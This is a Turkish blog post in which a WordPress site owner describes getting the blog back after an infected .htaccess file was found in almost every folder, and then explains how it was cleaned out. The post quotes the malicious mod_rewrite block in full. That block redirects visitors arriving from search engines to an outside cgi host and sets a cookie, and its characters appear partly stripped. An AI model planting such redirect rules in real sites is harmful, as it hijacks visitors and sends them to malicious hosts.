Evet bir kaç gündür bloguma ulaşmak isteyip de ulaşamayan arkadaşlar farketmiş olacaktır. İlk iki gün 503 hatası alınca server bazlı bir sorun olduğunu düşünerek hosting firmama ticket açtım ve bir süre cevap bekleyerek geçti ki gelen cevapta server konfigrasyonlarında bir sorunun olmadığı tema yada kurulu olan wordpress ile ilgili sorun olduğu konusunda bir geri dönüş olunca zamanın da darlığı ile öncelikle başladım ftp de dolaşmaya.
Birden farkettim ki abartısız her klasörün içinde var olan bir .htaccess dosyası var merak ettim ve içeriğine baktığımda da agent’ları hedef alan ve sonrasında siteyi yoran bir kod bloğuyla karşılaştım.
[highlight]# exgocgkctswo RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http)([^].)(google.yahoo.bing.msn.yandex.ask.excite.altavista.netscape.aol.hotbot.goto.infoseek.mamma.alltheweb.lycos.search.metacrawler.rambler.mail.dogpile.ya.search).$ [NC] RewriteCond %{HTTP_REFERER} !^.(q=cache).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(bingAccoonaAcesExplorerAmfibiAmigasOSapacheappieAppleSyndication).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(ArchiveArgusAsksJeevesasteriasAtrenkosNewsBeOSBigBlogZoo).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(BookmarkbotCE-PreloadCFNetworkcococCombineCrawlcurlDangershiptop).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(DiagnosticsDTAAgentectoEmeraldShieldendoEvaalEverest-Vulcan).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(exactseekFeedFetchfindlinksFreeBSDFriendsterFucksYouGoogle).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(GregariusHatenaScreenshotheritrixHolyCowDudeHonda-SearchHP-UX).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(LinknSurfLinuxLiveJournalLonoponoLotus-NotesLycosLynxMac_PowerPC).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Mac_PPCMacs10MacsOSmacDNMacintoshMediapartnersMegiteMetaProducts).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(os=MacP900ipanscientperlPlayStationPOE-ComponentPrivacyFinder).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeriess60).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(SharpReaderSiteBarSlurpSnoopySoapsClientSocialmarksSpheresScout).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWins9x).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(Win16Win95Win98Windowss95Windowss98WindowssCEWindowssNTs4).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.(YandexYetiYouReadMeZhuaxiaZyBorg).$ [NC] RewriteCond %{HTTP_COOKIE} !^.xccgtswgokoe.$ RewriteCond %{HTTPS} ^off$ RewriteRule ^(.)$ httptrialworld.netcgi-binr.cgip=10003&i=604add41&j=327&m=e8d794e1972216960f0b996ffedc1a32&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe1%{HTTP_HOST}100800HttpOnly] # exgocgkctswo[/highlight]
Bu durumdan kurtulmak için öncelikle ftp’deki dosyalarımın tümünü bilgisayarıma indirdim. içinde yaklaşık 300’e yakın olan .htaccess dosyalarını temizledim bu arada bu noktada dikkat etmek gerekiyor .htaccess kullanan bir eklenti kullanıyor iseniz onuda silme ihtimalinize karşı öncelikle daha önce elinizde sağlam bir şekilde var olan bir yedeğinizin olması sizi olası sorunlardan koruyacaktır. Sonrasında ise wordpress’in kendi root dizinindeki .htaccess’de dahil olmak üzere tümünü kaldırdığınızdan emin iseniz FTP’deki dosyaları silerek bunları tekrar atmalısınız. Bu işlem bittiğinde aşağıdaki resimde de görüldüğü gibi sitenizi ilginç karakterlerle açılıyor görebilirsiniz. Endişelenmeyin.
Bu aşamada aklıma gelen ilk şey acaba wordpress’in dosyalarında da mı bir sıkıntı var diyerek temiz en son sürümü indirip dosyalarını tekrar ftp attım ama nafile. Birden Admin panelindeki Ayarlar menüsünde var olan “Kalıcı bağlantılar” ile .htaccess oluşturmak geldi aklımdan ve sorunda hallolmuş oldu böylece :) Bu arada Kalıcı bağlantılar menüsü altında ayarlarınızı resimdeki gibi yapmanız gerekmektedir.
Böylece bir kaç günlük aranın ardından daha sağlıklı bir şekilde kaldığımız yerden devam ediyoruz.
